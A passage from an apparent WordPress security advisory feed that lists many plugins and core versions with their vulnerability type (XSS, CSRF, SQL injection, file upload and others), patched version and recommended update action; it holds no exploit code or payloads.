Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Upload Media By URL

Vulnerability: Cross-Site Request Forgery via ‘umbu_download’
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery to Plugin Reset
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3.4
Recommended Action: Update to version 1.5.3.4, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Simple PopUp

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chartify – WordPress Chart Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: CataBlog

Vulnerability: Authenticated (Editor+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Catalog Feed by PixelYourSite

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: MailChimp Forms by MailMunch

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Real Cookie Banner: GDPR & ePrivacy Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.14.2
Recommended Action: Update to version 2.14.2, or a newer patched version

Plugin: Ketchup Restaurant Reservations

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.6
Recommended Action: Update to version 3.6.6, or a newer patched version

Plugin: WooCommerce Cart & Floating Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Unauthenticated Admin Account Creation
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.9
Recommended Action: Update to version 4.3.9, or a newer patched version

Plugin: Auto Featured Image (Auto Post Thumbnail)

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 3.9.16
Recommended Action: Update to version 3.9.16, or a newer patched version

Plugin: My Private Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WP Forum Server

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: proquoter

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: miniOrange Discord Integration

Vulnerability: Missing Authorization to Plugin Options Update
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: YITH Request a Quote for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Shortcode for Current Date

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: JSM file_get_contents() Shortcode

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery via Shortcode
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.13
Recommended Action: Update to version 1.7.13, or a newer patched version

Plugin: ALD – AliExpress Dropshipping and Fulfillment for WooCommerce Premium

Vulnerability: AliExpress Dropshipping and Fulfillment for WooCommerce Premium <= 1.1.0
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: File Manager

Vulnerability: Sensitive Information Exposure via Backup Filenames
Patched Version: 7.2.2
Recommended Action: Update to version 7.2.2, or a newer patched version

Plugin: Show-Hide / Collapse-Expand

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.5
Recommended Action: Update to version 4.11.5, or a newer patched version

Plugin: ActiveDEMAND

Vulnerability: Missing Authorization Checks
Patched Version: 0.2.28
Recommended Action: Update to version 0.2.28, or a newer patched version

Plugin: Import / Export Customizer Settings

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Post Meta Data Manager

Vulnerability: Missing Authorization to Post, Term, and User Meta Deletion
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Ibtana – WordPress Website Builder

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.1.4.9
Recommended Action: Update to version 1.1.4.9, or a newer patched version

Plugin: CMS Tree Page View

Vulnerability: Reflected Cross-Site Scripting via ‘post_type’
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Popup, Optin Form & Email Newsletters for Mailchimp, HubSpot, AWeber – MailOptin

Vulnerability: Missing Authorization to Cache Deletion
Patched Version: 1.2.50.0
Recommended Action: Update to version 1.2.50.0, or a newer patched version

Plugin: WP Guppy

Vulnerability: Information Disclosure
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Recently

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Block IPs for Gravity Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: gAppointments – Appointment booking addon for Gravity Forms

Vulnerability: Appointment booking addon for Gravity Forms <= 1.9.7
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: Social Media Widget by Acurax

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Auto Location for WP Job Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Click to Chat – HoliThemes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.18.1
Recommended Action: Update to version 3.18.1, or a newer patched version

Plugin: Export to Text

Vulnerability: Unauthenticated Post Export
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Universal Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Image Hover Effects for Elementor with Lightbox and Flipbox

Vulnerability: Caption Hover with Carousel <= 2.8
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: User Post Gallery – UPG

Vulnerability: UPG <= 2.19
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: UniConsent CMP for IAB TCF GPP Consent Mode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Question Title
Patched Version: 8.1.11
Recommended Action: Update to version 8.1.11, or a newer patched version

Plugin: LH Password Changer

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HD Quiz

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Js External Link Info

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Cross-Site Request Forgery via apbct_settings__update_account_email
Patched Version: 6.21
Recommended Action: Update to version 6.21, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Subscriber+ Arbitrary Post Deletion and Plugin Settings Update
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Malicious SVG
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘uucss_update_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Contact Form for WordPress – Ultimate Form Builder Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Local File Inclusion
Patched Version: 2.1.2.1
Recommended Action: Update to version 2.1.2.1, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: All In One Favicon

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: SMTP Mailing Queue

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Vertical scroll recent post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Unauthenticated SQL Injection via user_id
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Safe SVG

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Directory Traversal
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: BuddyPress

Vulnerability: 1.5-1.5.4
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.7.26.4
Recommended Action: Update to version 5.7.26.4, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Injection Guard

Vulnerability: Cross-Site Request Forgery to Whitelist Update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Five Minute Webshop

Vulnerability: Authenticated (Admin+) SQL Injection via id
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Nested Pages

Vulnerability: Missing Authorization
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Easy SVG Allow

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Activation Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO by 10Web

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via mf shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: PayGreen – Ancienne version

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clean Login

Vulnerability: Cross-Site Scripting
Patched Version: 1.12.6.4
Recommended Action: Update to version 1.12.6.4, or a newer patched version

Plugin: WP Open Street Map

Vulnerability: Cross-Site Request Forgery via wp_openstreetmaps
Patched Version: 1.30
Recommended Action: Update to version 1.30, or a newer patched version

Plugin: Restaurant Reservations

Vulnerability: Options Change
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Ready! Ecommerce Shopping Cart

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Event Registration Calendar By vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: miwoftp

Vulnerability: Cross-Site Request Forgery to Arbitrary File Deletion
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Core: WordPress

Vulnerability: Same Origin Policy Bypass
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Custom Twitter Feeds – A Tweets Widget or X Feed Widget

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Toggle The Title

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Exit Box Lite

Vulnerability: Full Path Disclosure
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Core: WordPress

Vulnerability: XML External Entity (XXE) Weakness
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Site Reviews

Vulnerability: Missing Authorization
Patched Version: 6.10.3
Recommended Action: Update to version 6.10.3, or a newer patched version

Plugin: FAQs Manager

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Layer Slider

Vulnerability: Cross-Site Request Forgery via save_slide_ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Plugin Mobile App Native 3.0

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Any Extension to Pages

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: SAML Single Sign On – SSO Login Standard

Vulnerability: Open Redirect
Patched Version: 16.0.8
Recommended Action: Update to version 16.0.8, or a newer patched version

Plugin: Drag and Drop Multiple File Upload PRO – Contact Form 7 Standard

Vulnerability: Directory Traversal
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: MPL-Publisher — Ebook & Audiobook Creator

Vulnerability: Various Plugins (Various Versions)
Patched Version: 1.29.2
Recommended Action: Update to version 1.29.2, or a newer patched version

Plugin: Button Builder – Buttons X

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Product Limit Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: kk Star Ratings – Rate Post & Collect User Feedbacks

Vulnerability: Missing Authorization
Patched Version: 5.4.6
Recommended Action: Update to version 5.4.6, or a newer patched version

Plugin: Easy Form Builder

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.5.7.1
Recommended Action: Update to version 2.5.7.1, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Cross-Site Scripting
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: BestWebSoft's Twitter

Vulnerability: Cross-Site Scripting
Patched Version: 2.55
Recommended Action: Update to version 2.55, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.19
Recommended Action: Update to version 1.15.19, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder

Vulnerability: Authenticated (Contributor+) Privilege Escalation
Patched Version: 1.35.15
Recommended Action: Update to version 1.35.15, or a newer patched version

Plugin: Amazon Einzeltitellinks

Vulnerability: Cross-Site Request Forgery to Arbitrary Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Alpine Photo Tile for Instagram

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WhitePage

Vulnerability: Cross-Site Request Forgery via params_api_form.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Lightweight Accordion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.15
Recommended Action: Update to version 1.5.15, or a newer patched version

Plugin: WPO365 | Mail Integration for Office 365 / Outlook

Vulnerability: Reflected Cross-Site Scripting via error_description
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Contact Form 7 <= 1.3.7.3
Patched Version: 1.3.7.4
Recommended Action: Update to version 1.3.7.4, or a newer patched version

Plugin: Ultimate SMS Notifications for WooCommerce

Vulnerability: CSV Injection
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Import Cross-Site Scripting
Patched Version: 1.12.1
Recommended Action: Update to version 1.12.1, or a newer patched version

Plugin: BERTHA AI. Your AI co-pilot for WordPress and Chrome

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.11.10.8
Recommended Action: Update to version 1.11.10.8, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Information Disclosure
Patched Version: 2.0.8
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.8, 2.1.6, 2.2.9, 2.3.9, 2.4.6, 2.5.4, 2.6.5, 2.7.4, 2.8.4, 2.9.5, 3.0.5, 3.1.4, 3.2.4, 3.3.5, 3.4.5, 3.5.5, 3.6.3, 3.7.4, 3.8.4, 3.9.8, 4.0.5, 4.1.2, 4.2.3, 4.3.3, 4.4.3, 4.5.1, 4.6.1, 4.7.2, 4.8.3, 4.9.1, 5.0.1, 5.1.2, 5.2.3, 5.3.2, 5.4.2, 5.5.3, 5.6.3, 5.7.3, 5.8.2, 5.9.2, 6.0.2, 6.1.3, 6.2.3, 6.3.5, 6.4.4, 6.5.2, 6.6.3, 6.7.2, 6.8.3, 6.9.2, 7.0.3, 7.1.3, 7.2.3, 7.3.3, 7.4.3, 7.5.5, 7.6.2, 7.7.4, 7.8.2, 7.9.2, 8.0.1, 8.1.2, 8.2.4, 8.3.1, 8.4.3, 8.5.1, 8.6.2, 8.7.2, 8.8.3, 8.9.2, 9.0.3, 9.1.1, 9.2.2, 9.3.3, 9.4.2, 9.5.3, 9.6.2, 9.7.1

Plugin: twitterDash

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Review Stream

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Missing Authorization to Arbitrary Post Deletion
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Scripting
Patched Version: 0.4.5
Recommended Action: Update to version 0.4.5, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.4.2
Recommended Action: Update to version 3.0.4.2, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Instant Images – One-click Image Uploads from Unsplash, Openverse, Pixabay, Pexels, and Giphy

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.4.0.1
Recommended Action: Update to version 4.4.0.1, or a newer patched version

Plugin: Void Elementor Post Grid Addon for Elementor Page builder

Vulnerability: Missing Authorization to Review Notice Dismissal
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Firelight Lightbox

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.18
Recommended Action: Update to version 1.8.18, or a newer patched version

Plugin: All in One SEO Pro – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Admin+) Server Side Request Forgery
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: Contact Form X

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Swift SMTP (formerly Welcome Email Editor)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Authenticated Feedback Submission
Patched Version: 1.3.35
Recommended Action: Update to version 1.3.35, or a newer patched version

Plugin: GB Team Stats

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Document Embedder – Document Embedder Plugin

Vulnerability: Subscriber+ Arbitrary Private/Draft Post Title Disclosure
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Media File Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 4.6.9
Recommended Action: Update to version 4.6.9, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘attach_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1

Plugin: hybrid-composer

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: CBI Referral Manager

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Elegant Testimonial

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: English WordPress Admin

Vulnerability: Unauthenticated Open Redirect
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Missing Access Controls
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Authorization Bypass due to Improper Access Control
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.8.7
Recommended Action: Update to version 6.8.7, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Authenticated Settings Reset via reset-cmb Parameter
Patched Version: 1.0.27.1
Recommended Action: Update to version 1.0.27.1, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2.3
Recommended Action: Update to version 2.7.2.3, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2021.18
Recommended Action: Update to version 2021.18, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Missing Authorization via handle_installation
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 4.0.11
